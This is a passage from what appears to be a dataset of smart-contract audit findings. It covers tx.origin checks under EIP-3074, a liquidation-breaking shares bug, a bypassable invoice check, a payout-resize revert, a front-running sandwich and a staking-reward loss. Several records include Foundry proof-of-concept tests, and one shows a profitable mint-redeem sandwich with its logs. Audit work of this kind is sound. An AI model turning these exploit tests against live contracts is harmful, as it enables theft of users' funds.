The second sends a call as the authorized account. This essentially delegates control of the externally owned account (EOA) to a smart contract.\\nTherefore, using tx.origin to ensure msg.sender is an EOA will not hold true in the event EIP 3074 goes through.",```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (isContract(msg.sender)) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n,Using modifier `onlyEOAEx` to ensure calls are made only from EOA will not hold true in the event EIP 3074 goes through.,```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n +Incorrect shares accounting cause liquidations to fail in some cases,high,"Accounting mismatch when marking claimable yield against the vault's shares may cause failing liquidations.\\n`withdraw_underlying_to_claim()` distributes `_amount_shares` worth of underlying tokens (WETH) to token holders. Note that this burns the shares held by the vault, but for accounting purposes, the `total_shares` variable isn't updated.\\nHowever, if a token holder chooses to liquidate his shares, his `shares_owned` are used entirely in both `alchemist.liquidate()` and `withdrawUnderlying()`. Because the contract now holds fewer shares as a result of the yield distribution, the liquidation will fail.\\nPOC\\nRefer to the `testVaultLiquidationAfterRepayment()` test case below. 
Note that this requires a fix to be applied for #2 first.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../../lib/utils/VyperDeployer.sol"";\\n\\nimport ""../IVault.sol"";\\nimport ""../IAlchemistV2.sol"";\\nimport ""../MintableERC721.sol"";\\nimport ""openzeppelin/token/ERC20/IERC20.sol"";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(""Vault"", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n 
assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic 
over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\n","For the `shares_to_liquidate` and `amount_to_withdraw` variables, check against the vault's current shares and take the minimum of the 2.\\nThe better fix would be to switch from marking yield claims with withdrawing WETH collateral to minting debt (alETH) tokens.",Failing liquidations as the contract attempts to burn more shares than it holds.,"```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../../lib/utils/VyperDeployer.sol"";\\n\\nimport ""../IVault.sol"";\\nimport ""../IAlchemistV2.sol"";\\nimport ""../MintableERC721.sol"";\\nimport ""openzeppelin/token/ERC20/IERC20.sol"";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(""Vault"", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n 
vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 
0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\n" +when issuer set new winner by calling setTierWinner() code should reset invoice and supporting documents for that tier,medium,"if invoice or supporting documents are required to receive the winning prize then tier winner should provide them. bounty issuer or oracle would set invoice and supporting document status of a tier by calling `setInvoiceComplete()` and `setSupportingDocumentsComplete()`. bounty issuer can set tier winners by calling `setTierWinner()` but code won't reset the status of the invoice and supporting documents when tier winner changes. a malicious winner can bypass invoice and supporting document check by this issue.\\nif bounty issuer set invoice and supporting documents as required for the bounty winners in the tiered bounty, then tier winner should provide those and bounty issuer or off-chain oracle would set the status of the invoice and documents for that tier. but if issuer wants to change a tier winner and calls `setTierWinner()` code would changes the tier winner but won't reset the status of the invoice and supporting documents for the new winner. 
This is the `setTierWinner()` code in OpenQV1 and TieredBountyCore:\\n```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n\\nAs you can see code only sets the `tierWinner[tier]` and won't reset `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false. This would cause an issue when issuer wants to change the tier winner. these are the steps that makes the issue:\\nUserA creates tiered Bounty1 and set invoice and supporting documents as required for winners to claim their funds.\\nUserA would set User1 as winner of tier 1 and User1 completed the invoice and oracle would set `invoiceComplete[1]` = true.\\nUserA would change tier winner to User2 because User1 didn't complete supporting documents phase. 
now User2 is winner of tier 1 and `invoiceComplete[1]` is true and User2 only required to complete supporting documents and User2 would receive the win prize without completing the invoice phase.",set status of the `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false in `setTierWinner()` function.,malicious winner can bypass invoice and supporting document check when they are required if he is replace as another person to be winner of a tier.,"```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n" +Resizing the payout schedule with less items might revert,medium,"According to some comments in `setPayoutScheduleFixed`, reducing the number of items in the schedule is a supported use case. However in that case, the function will revert because we are iterating over as many items as there was in the previous version of the three arrays making the function revert since the new arrays have less items.\\nLet say they were 4 items in the arrays `tierWinners`, `invoiceComplete` and `supportingDocumentsComplete` and we are resizing the schedule to 3 items. 
Then the following function would revert because we use the length of the previous arrays instead of the new ones in the for loops.\\n```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n\\nThe same issue exists on TieredPercentageBounty too.",```\\n for (uint256 i = 0; i < newTierWinners.length; i++) {\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < newInvoiceComplete.length; i++) {\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < newSupportingDocumentsCompleted.length; i++) {\\n 
newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n```\\n\\nNote this won't work if increasing the number of items compared to previous state must also be supported. In that case you must use the length of the smallest of the two arrays in each for loop.,Unable to resize the payout schedule to less items than the previous state.,"```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n" +The `exchangeRateStored()` function allows front-running on repayments,medium,"The `exchangeRateStored()` function allows to perform front-running attacks when a repayment 
is being executed.\\nSince `_repayBorrowFresh()` increases `totalRedeemable` value which affects in the final exchange rate calculation used in functions such as `mint()` and `redeem()`, an attacker could perform a front-run to any repayment by minting `UTokens` beforehand, and redeem these tokens after the front-run repayment. In this situation, the attacker would always be obtaining profits since `totalRedeemable` value is increased after every repayment.\\nProof of Concept\\n```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[1] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] ALICE balance:"", uToken.balanceOf(ALICE));\\n console.log(""[DAI] ALICE balance:"", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[2] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(""\\n 
[UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[3] Exchange rate:"", currExchangeRate);\\n }\\n```\\n\\nResult\\n```\\n[PASS] testMintRedeemSandwich() (gas: 560119)\\nLogs:\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] BOB balance: 100000000000000000000\\n [DAI] BOB balance: 0\\n [1] Exchange rate: 1000000000000000000\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] ALICE balance: 0\\n [DAI] ALICE balance: 99474750000000000000\\n [2] Exchange rate: 1000084166666666666\\n\\n [UToken] Total supply: 50000000000000000000\\n [UToken] BOB balance: 0\\n [DAI] BOB balance: 100008416666666666600\\n [3] Exchange rate: 1000084166666666668\\n```\\n",Issue The `exchangeRateStored()` function allows front-running on repayments\\nAn approach could be implementing TWAP in order to make front-running unprofitable in this situation.,An attacker could always get profits from front-running repayments by taking advantage of `exchangeRateStored()` calculation before a repayment is made.,"```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n 
console.log(""[1] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] ALICE balance:"", uToken.balanceOf(ALICE));\\n console.log(""[DAI] ALICE balance:"", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[2] Exchange rate:"", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(""\\n [UToken] Total supply:"", uToken.totalSupply());\\n console.log(""[UToken] BOB balance:"", uToken.balanceOf(BOB));\\n console.log(""[DAI] BOB balance:"", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(""[3] Exchange rate:"", currExchangeRate);\\n }\\n```\\n" +Users can lose their staking rewards.,medium,"By following the steps described in `Vulnerability Detail`, user is able to lose all of his staking rewards.\\nThe issue occurs in the following steps described below:\\nKiki calls the function `unstake` and unstakes all of his funds, as a result the internal function `_updateStakedCoinAge` is called to update his staked coin age till the current block.\\n```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. 
Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n\\n```\\ncontracts/user/UserManager.sol\\n\\n function _updateStakedCoinAge(address stakerAddress, Staker storage staker) private {\\n uint64 currentBlock = uint64(block.number);\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 blocksPast = (uint256(currentBlock) - _max(lastWithdrawRewards, uint256(staker.lastUpdated)));\\n staker.stakedCoinAge += blocksPast * uint256(staker.stakedAmount);\\n staker.lastUpdated = currentBlock;\\n }\\n```\\n\\nAfter that Kiki calls the function `withdrawRewards` in order to withdraw his staking rewards. 
Everything executes fine, but the contract lacks union tokens and can't transfer the tokens to Kiki, so the else statement is triggered and the amount of tokens is added to his accrued balance, so he can still be able to withdraw them after.\\n```\\ncontracts/token/Comptroller.sol\\n\\n function withdrawRewards(address account, address token) external override whenNotPaused returns (uint256) {\\n IUserManager userManager = _getUserManager(token);\\n // Lookup account state from UserManager\\n (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n // Lookup global state from UserManager\\n uint256 globalTotalStaked = userManager.globalTotalStaked();\\n uint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n // update the global states\\n gInflationIndex = _getInflationIndexNew(globalTotalStaked, block.number - gLastUpdatedBlock);\\n gLastUpdatedBlock = block.number;\\n users[account][token].updatedBlock = block.number;\\n users[account][token].inflationIndex = gInflationIndex;\\n if (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n return 0;\\n }\\n }\\n```\\n\\nThis is where the issue occurs, next time Kiki calls the function `withdrawRewards`, he is going to lose all of his rewards.\\nExplanation of how this happens:\\nFirst the internal function _getUserInfo will return the struct `UserManagerAccountState memory user`, which contains zero amount for effectiveStaked, because Kiki unstaked all of his funds and already called the function withdrawRewards once. 
This happens because Kiki has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0`.\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\nThe cache `uint256 amount` will have a zero value because of the if statement applied in the internal function `_calculateRewardsByBlocks`, the if statement will be triggered as Kiki's effectiveStaked == 0, and as a result the function will return zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with ""amount"", which is actually zero. As a result Kiki will lose his rewards.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\n","One way of fixing this problem, that l can think of is to refactor the function _calculateRewardsByBlocks. First the function _calculateRewardsByBlocks will revert if `(totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0)`. 
Second new if statement is created, which is triggered if `user.effectiveStaked == 0`.\\nif `userInfo.accrued == 0`, it will return 0.\\nif `userInfo.accrued != 0`, it will return the accrued balance.\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n revert ZeroNotAllowed();\\n }\\n \\n if (user.effectiveStaked == 0) {\\n if (userInfo.accrued == 0) return 0;\\n else return userInfo.accrued\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = _getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\n","The impact here is that users can lose their staking rewards.\\nTo understand the scenario which is described in `Vulnerability Detail`, you'll need to know how the codebase works. 
Here in the impact section, l will describe in little more details and trace the functions.\\nThe issue occurs in 3 steps like described in Vulnerability Detail:\\nUser unstakes all of his funds.\\nThen he calls the function `withdrawRewards` in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nExplanation in details:\\nUser unstakes all of his funds by calling the function `unstake`.\\nHis stakedAmount will be reduced to zero in the struct `Staker`.\\nHis stakedCoinAge will be updated to the current block with the internal function `_updateStakedCoinAge`.\\nThen he calls the function withdrawRewards in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nUser's stakedCoinAge, lockedCoinAge and frozenCoinAge are reduced to zero in the function `onWithdrawRewards`.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nIn order to withdraw his accrued rewards stored in his struct balance `Info`. 
He calls the function `withdrawRewards` again and this is where the issue occurs, as the user has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0` .\\nDuo to that the outcome of the function _getCoinAge, which returns a memory struct of CoinAge to the function `_getEffectiveAmounts` will look like this:\\n```\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n// The function will return:\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: random number,\\n diff: random number,\\n stakedCoinAge: 0 + random number * 0,\\n lockedCoinAge: 0, \\n frozenCoinAge: 0\\n });\\n```\\n\\nAs a result the function `_getEffectiveAmounts` will return zero values for effectiveStaked and effectiveLocked to the function `onWithdrawRewards`.\\n```\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n 0\\n );\\n```\\n\\nAfter that the function `withdrawRewards` caches the returning value from the internal function `_calculateRewardsByBlocks`. 
